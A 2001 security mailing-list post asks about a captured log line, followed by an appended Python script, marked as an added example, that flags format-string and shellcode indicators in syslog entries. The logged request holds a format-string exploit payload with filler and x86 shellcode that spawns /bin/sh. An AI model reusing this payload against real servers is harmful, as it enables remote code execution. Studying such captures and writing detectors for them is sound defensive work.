[Dshield] buffer overflow?

ALEPH0 aleph0 at pacbell.net
Thu Nov 15 05:45:37 GMT 2001


Found these in my logs (copy/paste from vi).  Looks like a buffer overflow
to get a shell attempt.  They are in repetitive groups and on each of my
servers on one of my networks.  Anyone know this one in particular and if I
should be concerned?  What I don't know is what is SERVER here.

Nov 14 20:43:31 hostname SERVER[4302]: Dispatch_input: bad request line
'BBì¿í¿î¿ï¿XXXXXXXXXXXXXXXXXX%.172u%300$n%.17u%301$n%.253u%302$n%.192u%303$n
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P1Û1É1À°FÍ~@~Iå1Ò²f~I
1É~IËC~I]øC~I]ôK~IMü~MMôÍ~@1É~IEôCf~I]ìfÇEî^O'~IM ~MEì~IEøÆEü^P~I ~MMôÍ~@~I
CCÍ~@~I CÍ~@~IÃ1ɲ?~I Í~@~I
AÍ~@ë^X^~Iu^H1À~HF^G~IE^L°^K~Ió~MM^H~MU^LÍ~@èã/bin/sh'

I also run a bunch of homebuilt fake logging daemons on many trojan ports
and found on this same network a lot of activity on port 27374 starting a
couple days ago.
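
A log triage sketch for entries like the one above, added here as an example and not part of the original post. It flags printf-style `%n` conversion specifiers (including the `%300$n` direct-parameter form visible in the logged request), precision-padded conversions such as `%.172u`, long repeated filler runs, and a shell path. The sample lines are constructed, modelled on the posted entry's syslog shape, and the flag names are hypothetical.

```python
import re

# %n family: optional direct-parameter index ("300$"), optional length modifier, then n.
WRITE_SPEC = re.compile(r"%(?:\d+\$)?(?:hh|h|ll|l)?n")
# Precision-padded numeric conversion such as %.172u (dot required, so URL-encoded
# text like "%20d" is not flagged).
PAD_SPEC = re.compile(r"%\d*\.\d+[udxi]")
# Any unit of 1-4 characters repeated 16+ times back to back, e.g. the "~P" runs.
REPEAT_RUN = re.compile(r"(.{1,4}?)\1{15,}", re.S)
# Syslog shape used in the post: "<timestamp> <host> <program>[<pid>]: <message>"
SYSLOG = re.compile(r"^(\w{3} +\d+ [\d:]{8}) (\S+) (\S+?)\[(\d+)\]: (.*)$", re.S)

# Constructed sample input (not real captures); the first line mimics the posted entry.
SAMPLE = [
    "Nov 14 20:43:31 hostname SERVER[4302]: Dispatch_input: bad request line "
    "'BBXXXXXXXXXXXXXXXXXX%.172u%300$n%.17u%301$n" + "~P" * 40 + "/bin/sh'",
    "Nov 14 20:44:02 hostname SERVER[4302]: Dispatch_input: bad request line 'GET /a%20doc'",
    "Nov 14 20:45:10 hostname sshd[511]: Accepted publickey for admin",
]

def indicators(message):
    """Return the list of suspicious traits found in one logged message."""
    found = []
    if WRITE_SPEC.search(message):
        found.append("format-write-specifier")
    if PAD_SPEC.search(message):
        found.append("padded-conversion")
    if REPEAT_RUN.search(message):
        found.append("repeated-filler-run")
    if "/bin/sh" in message:
        found.append("shell-path")
    return found

def scan(lines):
    """Parse syslog lines and return one record per line that carries any indicator."""
    hits = []
    for line in lines:
        m = SYSLOG.match(line)
        if not m:
            continue
        ts, host, prog, pid, msg = m.groups()
        flags = indicators(msg)
        if flags:
            hits.append({"time": ts, "host": host, "program": prog,
                         "pid": int(pid), "flags": flags})
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Grouping the hits by `program` and `pid` shows which daemon logged the request, which is the first step toward answering what SERVER is on a given host.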




